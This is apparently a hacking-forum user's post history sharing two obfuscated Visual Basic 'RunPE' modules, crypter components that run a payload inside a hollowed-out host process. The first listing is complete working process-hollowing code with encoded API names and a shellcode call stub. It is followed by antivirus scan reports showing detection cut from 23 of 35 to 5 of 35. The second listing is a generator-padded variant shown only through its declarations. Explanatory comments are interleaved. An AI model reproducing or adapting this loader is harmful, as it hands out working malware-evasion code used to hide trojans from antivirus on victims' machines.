
Mensajes - K4RUN4

#1
Códigos Fuentes / Runpe Mod 2º
Diciembre 08, 2012, 10:54:12 PM
Código: vb
' Randomly named constants holding standard Win32 values. The meanings noted here
' follow from how each constant is used in cgjyTadqQ further down this listing.
Private Const F447LC9Xk As Long = &H10007 ' stored in the thread-context ContextFlags field; value equals x86 CONTEXT_FULL
Private Const nW3PkSMii As Integer = 260 ' not referenced in the visible code; 260 is the Win32 MAX_PATH value
Private Const uAEcIoE8o As Long = &H4 ' passed as the CreateProcessA creation flags; value equals CREATE_SUSPENDED
Private Const eSzW7GQdf As Long = &H1000 ' OR-ed with the next constant as an allocation type; value equals MEM_COMMIT
Private Const HdsMEIXAx As Long = &H2000 ' value equals MEM_RESERVE
Private Const bCd05T2O6 As Long = &H40 ' passed as the allocation's protection; value equals PAGE_EXECUTE_READWRITE
' API declarations used by this module. Parameter names are randomised; the Lib and
' function/Alias names are the real ones.
' Only CreateProcessA, WriteProcessMemory, RtlMoveMemory, CallWindowProcW,
' GetProcAddress and LoadLibraryA are called in the visible code; every other API the
' module uses is resolved at run time through GetProcAddress, so it does not appear
' in a Declare statement. MJbmWIYXu (OutputDebugStringA) is not called in the visible code.
' NOTE(review): the Lib strings for RtlMoveMemory and CallWindowProcW are padded with
' trailing spaces; this looks like a deliberate change to the literal text rather than a typo — confirm.
Private Declare Function CreateProcessA Lib "kernel32" (ByVal ZEuNODw1p As String, ByVal xMmicgUXB As String, ByVal nHQpEku43 As Long, ByVal QQ9E2IRO2 As Long, ByVal sf7Q6FWqz As Long, ByVal klh1LC0qa As Long, ByVal gpOq0ar08 As Long, ByVal lqV4QmVRl As Long, A9XZ0eH3c As IQVNXBW1K, XTbTNStC1 As IEuMTkEWN) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal fwp8F4lI1 As Long, UZLbQvjpN As Any, ADhSYKaSj As Any, ByVal rPTyCbu0O As Long, FRzhBrXZ3 As Long) As Long
Private Declare Function MJbmWIYXu Lib "kernel32" Alias "OutputDebugStringA" (ByVal vXeYdumBr As String) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32            " (coZ2NvrKQ As Any, nxNRVRMkt As Any, ByVal W3EjZ6INJ As Long)
Private Declare Function CallWindowProcW Lib "user32               " (ByVal x9gbSV7nf As Long, ByVal Jwx0qigOk As Long, ByVal XMGKQAwG0 As Long, ByVal FR8tPRVTq As Long, ByVal rd7Ig24TO As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal R9W0Wwz8O As Long, ByVal bEH39kATm As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal PSc4W5Rzh As String) As Long
' Field layout matches the Win32 SECURITY_ATTRIBUTES structure under a random type name.
' Not referenced in the visible code (CreateProcessA is called with 0 for both
' security-attribute arguments).
Private Type l741Ghab0
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
' Field layout matches the Win32 STARTUPINFO structure, with the string pointers
' declared as Long. Passed as the startup-info argument of CreateProcessA; only cb is
' filled in by the visible code.
Private Type IQVNXBW1K
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
' Field layout matches the Win32 PROCESS_INFORMATION structure. The first field (the
' process-handle slot) carries a random name; the visible code passes it wherever a
' handle to the newly created process is required.
Private Type IEuMTkEWN
fwp8F4lI1 As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type
' Field layout matches the x86 FLOATING_SAVE_AREA structure; embedded as the
' FloatSave member of the thread-context type.
Private Type Aa5vmpDi3
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
' Field layout matches the 32-bit x86 thread CONTEXT structure up to SegSs.
' The visible code reads Ebx and overwrites Eax on a variable of this type; no other
' register field is touched.
Private Type Rk3tnkYdN
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As Aa5vmpDi3
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
' Field layout matches IMAGE_DOS_HEADER (64 bytes). The visible code copies the first
' 64 bytes of the payload buffer into it and reads only e_lfanew; e_magic is never checked.
Private Type K2X0B2HMz
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
' Field layout matches IMAGE_FILE_HEADER (COFF file header). The visible code reads
' NumberOfSections from it to bound the section-copy loop.
Private Type DL1Kv8t0h
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type
' Field layout matches IMAGE_DATA_DIRECTORY; used only as the element type of the
' optional header's DataDirectory array.
Private Type kEnzAI55k
VirtualAddress As Long
Size As Long
End Type
' Field layout matches the 32-bit IMAGE_OPTIONAL_HEADER. The visible code reads
' ImageBase, SizeOfImage, SizeOfHeaders and AddressOfEntryPoint from it; Magic is
' never checked, so a non-32-bit image is not rejected.
Private Type KjpHYYXJc
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
' NT additional fields.
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As kEnzAI55k
End Type
' Field layout matches the 32-bit IMAGE_NT_HEADERS (signature + file header +
' optional header). The visible code fills it with a fixed 248-byte copy taken at
' offset e_lfanew of the payload; Signature is never checked.
Private Type SneHkJnLR
Signature As Long
FileHeader As DL1Kv8t0h
OptionalHeader As KjpHYYXJc
End Type
' Field layout matches IMAGE_SECTION_HEADER. The visible code reads VirtualAddress,
' PointerToRawData and SizeOfRawData for each section and uses them unchecked as
' offsets and lengths.
Private Type k9W00b66a
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type
' String decoder: subtracts RfhiH80fE from the character code of every character of
' REbjcq5c4 and returns the result (a fixed-offset character shift).
'   REbjcq5c4 - text to decode; declared without ByVal, so it is rewritten in place
'   RfhiH80fE - amount subtracted from each character code
' The function has no declared return type, so the result is returned as a Variant.
' Same logic as wVAxmxZR0; the two are nested at the call sites so that neither the
' decoded text nor the shift amounts appear as plain literals.
Public Function okLbTkVkI(REbjcq5c4 As String, RfhiH80fE As Integer)
    Dim e2u96yIrC As Integer
   
    For e2u96yIrC = 1 To Len(REbjcq5c4)
        ' Replace the character at this position with the one RfhiH80fE code points lower.
        Mid(REbjcq5c4, e2u96yIrC, 1) = Chr(Asc(Mid(REbjcq5c4, e2u96yIrC, 1)) - RfhiH80fE)
    Next e2u96yIrC
    okLbTkVkI = REbjcq5c4
End Function
' Starts sHost as a suspended process, replaces its mapped image with the PE file held
' in ADhSYKaSj, and resumes it. This is the technique catalogued as process hollowing
' (MITRE ATT&CK T1055.012).
'   sHost     - path of the executable started as the host process
'   ADhSYKaSj - raw bytes of the PE file placed into the host; no header signature,
'               offset or size taken from it is validated
'   parameter - text appended to the host's command line
' No API return value is checked anywhere in this routine.
' Library and function names are stored shifted and recovered with okLbTkVkI /
' wVAxmxZR0, so they do not appear as plain strings in the compiled file; the names
' given in the comments below come from applying those shifts.
' NOTE(review): several of the encoded literals contain characters that appear to
' have been altered by the page's text encoding, so some names are partly inferred
' from the argument lists - confirm against the original sample.
' Behaviour worth monitoring for: suspended process creation followed by unmapping of
' the main image, a cross-process read/write/execute allocation, cross-process
' writes, a thread-context change and a resume, all from the same parent.
Sub cgjyTadqQ(ByVal sHost As String, ByRef ADhSYKaSj() As Byte, parameter As String)
Dim tFogYBkqM As Long
Dim Bu5wgPZne As K2X0B2HMz
Dim HIKRNiitq As SneHkJnLR
Dim UhtIMHdMW As k9W00b66a
Dim axquzdtgF As IQVNXBW1K
Dim lJYqbyJJM As IEuMTkEWN
Dim DukBkGsk0 As Rk3tnkYdN
axquzdtgF.cb = Len(axquzdtgF)
' Read the 64-byte DOS header, then 248 bytes of NT headers at e_lfanew, from the payload.
RtlMoveMemory Bu5wgPZne, ADhSYKaSj(0), 64
RtlMoveMemory HIKRNiitq, ADhSYKaSj(Bu5wgPZne.e_lfanew), 248
' Create the host process with creation flags &H4 (suspended). The decoded command-line
' prefix is a single space, followed by the caller's parameter.
CreateProcessA sHost, okLbTkVkI(wVAxmxZR0("/", wVAxmxZR0(";", "2")), wVAxmxZR0("<", wVAxmxZR0(";", "5"))) & parameter, 0, 0, False, uAEcIoE8o, 0, 0, axquzdtgF, lJYqbyJJM
' ntdll / NtUnmapViewOfSection(process, ImageBase): removes the host's mapping at the payload's preferred base.
mOCsghEaW okLbTkVkI(wVAxmxZR0("|,rzz", "8"), wVAxmxZR0("<", wVAxmxZR0(";", "5"))), okLbTkVkI(wVAxmxZR0("U{\uthw]pl~VmZlj{pvu", "3"), wVAxmxZR0(wVAxmxZR0(";", "2"), "5")), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase
' kernel32 / VirtualAllocEx(process, ImageBase, SizeOfImage, &H1000 Or &H2000, &H40): commit+reserve, read/write/execute.
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("fy,,,...q|Q||sUˆ", wVAxmxZR0("<", "3")), wVAxmxZR0("8", wVAxmxZR0(wVAxmxZR0("<", "3"), "8"))), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase, HIKRNiitq.OptionalHeader.SizeOfImage, eSzW7GQdf Or HdsMEIXAx, bCd05T2O6
' Write the payload's headers to ImageBase in the host process.
WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase, ADhSYKaSj(0), HIKRNiitq.OptionalHeader.SizeOfHeaders, 0
' For every section: read its 40-byte section header (headers start 248 bytes after
' e_lfanew) and write its raw data to ImageBase + VirtualAddress in the host.
For tFogYBkqM = 0 To HIKRNiitq.FileHeader.NumberOfSections - 1
RtlMoveMemory UhtIMHdMW, ADhSYKaSj(Bu5wgPZne.e_lfanew + 248 + 40 * tFogYBkqM), Len(UhtIMHdMW)
WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase + UhtIMHdMW.VirtualAddress, ADhSYKaSj(UhtIMHdMW.PointerToRawData), UhtIMHdMW.SizeOfRawData, 0
Next tFogYBkqM
DukBkGsk0.ContextFlags = F447LC9Xk
' kernel32 / GetThreadContext(thread, context): read the suspended main thread's registers.
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("LjyYmwjfiHtsyj}y", "4"), wVAxmxZR0(wVAxmxZR0("<", "3"), "8")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
' Write the 4-byte ImageBase to address Ebx + 8 in the host.
' NOTE(review): presumably the image-base field of the host's PEB - confirm.
WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal DukBkGsk0.Ebx + 8, HIKRNiitq.OptionalHeader.ImageBase, 4, 0
' Point Eax at the payload's entry point.
DukBkGsk0.Eax = HIKRNiitq.OptionalHeader.ImageBase + HIKRNiitq.OptionalHeader.AddressOfEntryPoint
' kernel32 / SetThreadContext(thread, context): apply the modified registers.
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`raurnqP|{r...", "4"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
' kernel32 / ResumeThread(thread): let the host's main thread run.
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`sƒ{sbv€sor", "5"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread
End Sub
' Calls an exported function chosen at run time: sMod from library sLib, with the
' values in Params as its arguments.
'   sLib   - library name handed to LoadLibraryA
'   sMod   - export name handed to GetProcAddress
'   Params - arguments for the target; each is converted to a 32-bit Long
' Returns the value CallWindowProcW returns, or 0 (never assigned) when
' GetProcAddress yields 0.
' The call is made through a short x86 stub assembled in a local byte array and run
' by passing the array's address to CallWindowProcW as the procedure to call. Because
' of this, the APIs used by callers never appear in a Declare statement.
' NOTE(review): the stub is executed from an ordinary data buffer; this presumably
' relies on DEP not being enforced for the process - confirm.
Function mOCsghEaW(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
Dim iaQt4rNA9 As Long
Dim cluYs57Jw(&HEC00& - 1) As Byte
Dim tFogYBkqM As Long
Dim xsYHO71Kp As Long

xsYHO71Kp = GetProcAddress(LoadLibraryA(sLib), sMod)
If xsYHO71Kp = 0 Then Exit Function

' iaQt4rNA9 is the write cursor into the stub buffer.
iaQt4rNA9 = VarPtr(cluYs57Jw(0))
' Bytes 58 59 59 59 59 50: pop the return address into eax, pop four more stack
' values (the four extra CallWindowProcW arguments) into ecx, push the return address back.
RtlMoveMemory ByVal iaQt4rNA9, &H59595958, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
RtlMoveMemory ByVal iaQt4rNA9, &H5059, &H2: iaQt4rNA9 = iaQt4rNA9 + 2
' One "push imm32" (byte 68) per argument, last argument first.
For tFogYBkqM = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal iaQt4rNA9, &H68, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
RtlMoveMemory ByVal iaQt4rNA9, CLng(Params(tFogYBkqM)), &H4: iaQt4rNA9 = iaQt4rNA9 + 4
Next
' Byte E8: relative call; the displacement is the target minus the address that follows the 4-byte operand.
RtlMoveMemory ByVal iaQt4rNA9, &HE8, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
RtlMoveMemory ByVal iaQt4rNA9, xsYHO71Kp - iaQt4rNA9 - 4, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
' Byte C3: ret.
RtlMoveMemory ByVal iaQt4rNA9, &HC3, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
mOCsghEaW = CallWindowProcW(VarPtr(cluYs57Jw(0)), 0, 0, 0, 0)
End Function

' String decoder: subtracts cW5sVXYkV from the character code of every character of
' eczX16djq and returns the result (a fixed-offset character shift).
'   eczX16djq - text to decode; declared without ByVal, so it is rewritten in place
'   cW5sVXYkV - amount subtracted from each character code; callers in this listing
'               pass numeric strings or nested decoder results, which VB converts to Integer
' The function has no declared return type, so the result is returned as a Variant.
' Same logic as okLbTkVkI.
Public Function wVAxmxZR0(eczX16djq As String, cW5sVXYkV As Integer)
    Dim wlUnDp6U2 As Integer
   
    For wlUnDp6U2 = 1 To Len(eczX16djq)
        ' Replace the character at this position with the one cW5sVXYkV code points lower.
        Mid(eczX16djq, wlUnDp6U2, 1) = Chr(Asc(Mid(eczX16djq, wlUnDp6U2, 1)) - cW5sVXYkV)
    Next wlUnDp6U2
    wVAxmxZR0 = eczX16djq
End Function


Date and Time: 12/8/2012 8:47:39 PM
File Name: Antes.exe
File Size: 16384 Bytes
MD5: 5d0e5cf9778421e9ad666d8d74a9e116
SHA1: e2d9ccc127170966fcf49725618a59d19df1cad7
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Trojan horse Injector.CBI
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.Qqlame

eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
G Data - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected SScope.Trojan.VBRA.3587
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)
BullGuard - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
Immunet Antivirus - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
K7 Ultimate - Riskware ( ed2edfef0 )
NANO Antivirus - Clean!
VIPRE - VirTool.Win32.VBInject.gen.bp (v)


Date and Time: 12/8/2012 8:43:12 PM
File Name: Final.exe
File Size: 20480 Bytes
MD5: f6f0b5f07628932200386c2e26522310
SHA1: f626a85cff0e06a7a722cad6917bc57fd5651c8a
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - Clean!
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Backdoor.Win32.Poison
Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Suspicious
A-Squared - Backdoor.Win32.Poison!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Clean!
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Clean!
NANO Antivirus - Clean!
VIPRE - Clean!

#2
Visual Basic / Runpe Mod K4
Octubre 11, 2012, 05:04:34 PM
Runpe Generador skyweb007
Código: vb

' Constants for the second listing. Each group of three holds one value that the
' visible part of nJLJ0h51B uses, placed between two large constants that are not
' referenced in the visible code (presumably filler added by the generator - confirm).

Private Const iTODXOFScMLkMiuJqI As Long = 884210437
Private Const oHlUFbB7c As Long = &H10007 ' stored in the thread-context ContextFlags field; value equals x86 CONTEXT_FULL
Private Const KPoPaUmjGcBsoBRgCp As Long = 43885802

Private Const UdpSlRoHgHSMeNkUek As Long = 571456721
Private Const XkLbWZwT0 As Integer = 260 ' not referenced in the visible code; 260 is the Win32 MAX_PATH value
Private Const BvJabvwHeMpFlrLTJo As Long = 666743405

Private Const UZKDKoCBRUXPnDyfOQ As Long = 623572428
Private Const bTQl9oDeY As Long = &H4 ' passed as the CreateProcessA creation flags; value equals CREATE_SUSPENDED
Private Const rtZtAIvclmkpNTaFSR As Long = 667513285

Private Const PSKiMqoWLfWMakTTGH As Long = 670505035
Private Const E4r2NPXmu As Long = &H1000 ' OR-ed with EQIAtwHT0 in a run-time-resolved call; value equals MEM_COMMIT
Private Const gfkVOVAaMcfiacHqmb As Long = 865706641

Private Const kFYSInvwyBlelQdcsy As Long = 73541772
Private Const EQIAtwHT0 As Long = &H2000 ' value equals MEM_RESERVE
Private Const NPHgynYGIcFKYUDQpp As Long = 346262605

Private Const PAHOeFFULNFeHljRGa As Long = 314522005
Private Const mvUSFCqYB As Long = &H40 ' last argument of the same call; value equals PAGE_EXECUTE_READWRITE
Private Const qhYmvfeSFfCOcKbOSr As Long = 554761501


' Start of the Declare section of the second listing. In the visible code only
' CreateProcessA, WriteProcessMemory, RtlMoveMemory, GetProcAddress, LoadLibraryA and
' CallWindowProcA are called; the remaining declarations (user32, gdi32, winmm,
' version, olepro32, shell32 and others under random names) are not referenced in the
' visible part and look like generator-added filler - confirm against the full file.
' Several of them have a random name and no Alias, so they could only resolve if the
' DLL exported that exact random name.
Private Declare Function FOZTxMgzSNCirs Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
Private Declare Function gZhKYQnrtlK Lib "winmm.dll" (ByRef phMixer As Long, ByVal uMxId As Long, ByVal dwCallback As Long, ByVal dwInstance As Long, ByVal fdwOpen As Long) As Long
Private Declare Function CkmGjoCMhviUvRQtar Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function HitnFCZ Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function LHTkzUIRpkNPwQVeSzH Lib "gdi32" (ByVal hMetaFile As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal Td57zdeAJ As String, ByVal irp2fgyco As String, ByVal RdLggVr0Q As Long, ByVal Fjn88KRAm As Long, ByVal VKa5eOX4s As Long, ByVal heV8nTQUC As Long, ByVal ofKb6Slk8 As Long, ByVal MCJpy2ujw As Long, jvQsfC7ZK As HvWIgrbaI, OpDxItsdy As Ikr1WTQJc) As Long
Private Declare Function LjqxbonDHKBbqjS Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
Private Declare Function YAESOxLllLUhJd Lib "USER32" Alias "LoadBitmapA" (ByVal hInstance As Long, ByVal lngBitmapID As Long) As Long
Private Declare Function yYyJDVF Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
Private Declare Function VcYkAPQZiFAegMSm Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function PKLJOzGN Lib "gdi32" (ByVal hMetaFile As Long) As Long
Private Declare Function ETJMEdGljQFaQH Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long

Private Declare Function BdlxatZwObOMG Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function scnspARSopyQDhwdjCK Lib "winmm.dll" (ByVal uPeriod As Long) As Long
Private Declare Function bcafPI Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As Long) As Long
Private Declare Function UGQbdUuQBmh Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
Private Declare Function hYlwfeRDfB Lib "winmm.dll" () As Long
Private Declare Function JbMQr Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal CE9yvfJTt As Long, b5IFtuNEU As Any, jJge24yxK As Any, ByVal U3W2edK9C As Long, fjly1tZq8 As Long) As Long
Private Declare Function QpmIfD Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
Private Declare Function QTjEFOZTxMgzSN Lib "version.dll" Alias "GetFileVersionInfoSizeA" (ByVal lptstrFilename As String, lpdwHandle As Long) As Long
Private Declare Function rsqvgZh Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
Private Declare Function QnrtlKaRCkmGjoCMhviU Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function QtareiHitnFCZvTLHT Lib "gdi32" (ByVal hGDIObj As Long) As Long

Private Declare Function KFjlRlrzo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function echEKR Lib "USER32.DLL" (ByVal hwndParent As Long, ByVal lpEnumCallback As Long, ByVal lParam As Long) As Long
Private Declare Function IZdfQwLDoVYsUank Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function FFhpCey Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function TtTfZraxhrxtF Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function suDbVzBi Lib "winmm.dll" () As Long
Private Declare Function WSkaKIVom Lib "kernel32" Alias "OutputDebugStringA" (ByVal cgRmc7IJv As String) As Long
Private Declare Function PEkggfkUbjzaZpf Lib "winmm.dll" (ByVal hMixer As Long) As Long
Private Declare Function ycGEm Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
Private Declare Function lcqAjjVQxGS Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function tRkvkhbtqNxHNJVmn Lib "gdi32" (ByVal hMetaFile As Long) As Long


Private Declare Function etagzHxdYYQcM Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function rRDTQaRqTyieSneUi Lib "version.dll" Alias "VerQueryValueA" (pBlock As Any, ByVal lpSubBlock As String, lplpBuffer As Any, puLen As Long) As Long
Private Declare Function bOAcy Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function GYJNocaTmjFbzFBNQgBC Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function QuJcwPKzfopnsdVdHUT Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function qiHVOzhjD Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32" (AxGGLYZ7E As Any, d2l6uk0Pt As Any, ByVal l1p6nLoNB As Long)
Private Declare Function yJerfQsO Lib "winmm.dll" Alias "mciSendStringA" (ByVal CommandString As String, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long, ByVal hCallback As Long) As Long 'MCIERROR
Private Declare Function QoaeEfqkC Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function sQIEPhwRFOmhKMtMSbP Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
Private Declare Function FDIgmuYlkAEGyY Lib "gdi32" (ByVal hGDIObj As Long) As Long
Private Declare Function PxzTwB Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long

Private Declare Function CemzbuayPqQcV Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function tdouqBSipqAYSwyelEMB Lib "winmm.dll" (ByVal hMixer As Long) As Long
Private Declare Function dbgRY Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
Private Declare Function QVmcfQvYDBj Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
Private Declare Function iZnxggSSuC Lib "winmm.dll" (ByVal uPeriod As Long) As Long
Private Declare Function CallWindowProcA Lib "USER32" (ByVal Tg75MhFRu As Long, ByVal gEdEnMOb8 As Long, ByVal EmFxf7Lra As Long, ByVal TNZRPnQNL As Long, ByVal wZ1lfnc1U As Long) As Long
Private Declare Function LqOgsheYqn Lib "USER32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function EKGSjkFHQoU Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function vBUdRxttswibiMnZo Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
Private Declare Function nLpTDzoIypD Lib "gdi32" (ByVal hColorSpace As Long) As Long

Private Declare Function ZvHVDUGKlZVP Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function CYwCyK Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
Private Declare Function xzISN Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
